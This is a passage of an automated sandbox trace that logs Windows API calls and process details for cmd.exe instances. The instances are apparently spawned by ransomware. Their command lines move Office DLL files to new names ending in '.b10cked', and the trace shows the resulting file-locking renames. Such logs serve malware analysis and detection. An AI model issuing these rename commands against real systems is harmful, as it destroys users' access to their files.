lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af560, lpFilePart=0x2af55c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af55c*="Desktop") returned 0x18 [0157.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.107] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af2dc | out: lpFindFileData=0x2af2dc) returned 0x4309f0 [0157.107] FindClose (in: hFindFile=0x4309f0 | out: hFindFile=0x4309f0) returned 1 [0157.107] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af2dc | out: lpFindFileData=0x2af2dc) returned 0x4309f0 [0157.107] 
FindClose (in: hFindFile=0x4309f0 | out: hFindFile=0x4309f0) returned 1 [0157.108] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af2dc | out: lpFindFileData=0x2af2dc) returned 0x4309f0 [0157.108] FindClose (in: hFindFile=0x4309f0 | out: hFindFile=0x4309f0) returned 1 [0157.108] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.108] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0157.108] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0157.108] GetEnvironmentStringsW () returned 0x430210* [0157.108] FreeEnvironmentStringsW (penv=0x430210) returned 1 [0157.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.109] GetConsoleOutputCP () returned 0x1b5 [0157.109] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.109] GetUserDefaultLCID () returned 0x409 [0157.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af6a0, cchData=128 | out: lpLCData="0") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af6a0, cchData=128 | out: lpLCData="0") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af6a0, cchData=128 | out: lpLCData="1") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0157.110] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0157.110] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.111] GetConsoleTitleW (in: lpConsoleTitle=0x420930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.111] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0157.111] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0157.111] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0157.112] _wcsicmp (_String1="move", _String2=")") returned 68 [0157.112] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0157.112] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0157.112] _wcsicmp (_String1="IF", _String2="move") returned -4 [0157.112] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0157.113] _wcsicmp (_String1="REM", _String2="move") returned 5 [0157.113] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0157.117] GetConsoleTitleW (in: lpConsoleTitle=0x2af398, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.117] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0157.117] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0157.117] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0157.117] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0157.117] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0157.117] _wcsicmp (_String1="move", _String2="CD") returned 10 [0157.117] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0157.117] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="REN") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0157.118] _wcsicmp (_String1="move", _String2="SET") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0157.118] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0157.118] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0157.118] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0157.118] _wcsicmp (_String1="move", _String2="MD") returned 11 [0157.118] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0157.118] _wcsicmp (_String1="move", _String2="RD") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0157.118] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0157.118] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0157.118] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0157.118] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0157.118] _wcsicmp (_String1="move", _String2="VER") returned -9 [0157.118] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0157.118] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0157.118] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0157.118] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0157.118] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0157.118] _wcsicmp (_String1="move", _String2="START") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0157.118] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0157.118] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0157.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.120] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af154, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af14c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af14c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.122] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.122] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.122] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0157.122] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0157.122] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0157.122] _wcsicmp 
(_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0157.122] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwv~1.trx")) returned 0x2020 [0157.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x431f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.434] SetErrorMode (uMode=0x0) returned 0x0 [0157.434] SetErrorMode (uMode=0x1) returned 0x0 [0157.434] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2aeadc, lpFilePart=0x2aeac4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", lpFilePart=0x2aeac4*="OUTLWV~1.TRX") returned 0x3c [0157.434] SetErrorMode (uMode=0x0) returned 0x1 [0157.434] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0157.434] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0157.434] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0157.434] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwv~1.trx")) returned 0x2020 [0157.435] SetErrorMode (uMode=0x0) returned 0x0 [0157.435] SetErrorMode (uMode=0x1) returned 0x0 [0157.435] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2aef58, lpFilePart=0x2aecf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", lpFilePart=0x2aecf0*="OUTLWV~1.TRX") returned 0x3c [0157.435] SetErrorMode (uMode=0x0) returned 0x1 [0157.435] SetErrorMode (uMode=0x0) returned 0x0 [0157.435] SetErrorMode (uMode=0x1) returned 0x0 [0157.435] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af160, lpFilePart=0x2aecf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x2aecf0*="OUTLWVW.DLL.trx_dll.b10cked") returned 0x4b [0157.435] SetErrorMode (uMode=0x0) returned 0x1 [0157.435] SetLastError (dwErrCode=0x0) [0157.435] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll.b10cked")) returned 0xffffffff [0157.435] GetLastError () returned 0x2 [0157.435] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ae66c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae66c) returned 0x432130 [0157.436] FindNextFileW (in: hFindFile=0x432130, lpFindFileData=0x2ae66c | out: lpFindFileData=0x2ae66c) returned 0 [0157.436] GetLastError () returned 0x12 [0157.436] FindClose (in: hFindFile=0x432130 | out: hFindFile=0x432130) returned 1 [0157.438] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x431cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x431cc0) returned 0x432130 [0157.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0157.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2ae904, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0157.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll")) returned 0x2020 [0157.440] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0157.440] FindClose (in: hFindFile=0x432130 | out: hFindFile=0x432130) returned 1 [0157.440] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ae8b8 | out: _Buffer=" 1") returned 9 [0157.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.440] GetFileType (hFile=0x7) returned 0x2 [0157.440] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.441] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae844 | out: lpMode=0x2ae844) returned 1 [0157.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ae878 | out: lpConsoleScreenBufferInfo=0x2ae878) returned 1 [0157.441] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0157.441] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ae8b8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0157.441] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x2ae89c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ae89c*=0x1a) returned 1 [0157.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.442] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.442] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.442] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.442] SetConsoleInputExeNameW () returned 0x1 [0157.442] GetConsoleOutputCP () returned 0x1b5 [0157.442] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.442] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.443] exit (_Code=0) Process: id = "263" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21703 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21704 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21705 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21706 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21707 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21708 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21709 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21710 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21711 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 21712 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21713 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21714 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21715 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21716 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 21717 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 21718 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21719 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21720 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21721 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21722 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21723 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21724 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21725 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21726 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21727 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 21728 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21729 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21730 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21731 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21732 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21733 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21734 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 21735 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 21736 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001160000" filename = "" Thread: id = 326 os_tid = 0x82c [0157.547] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8a4 | out: lpSystemTimeAsFileTime=0x20f8a4*(dwLowDateTime=0x97d69460, dwHighDateTime=0x1d440a9)) [0157.547] GetCurrentProcessId () returned 0xe6c [0157.547] GetCurrentThreadId () returned 0x82c [0157.547] GetTickCount () returned 0x30453 [0157.547] QueryPerformanceCounter (in: lpPerformanceCount=0x20f89c | out: lpPerformanceCount=0x20f89c*=21433653282) returned 1 [0157.548] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0157.548] __set_app_type (_Type=0x1) [0157.548] __p__fmode () returned 0x76b331f4 [0157.548] __p__commode () returned 0x76b331fc [0157.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0157.549] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0157.549] GetCurrentThreadId () returned 0x82c [0157.549] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x82c) returned 0x38 [0157.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.549] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0157.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.549] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f834 | out: phkResult=0x20f834*=0x0) returned 0x2 [0157.549] VirtualQuery (in: 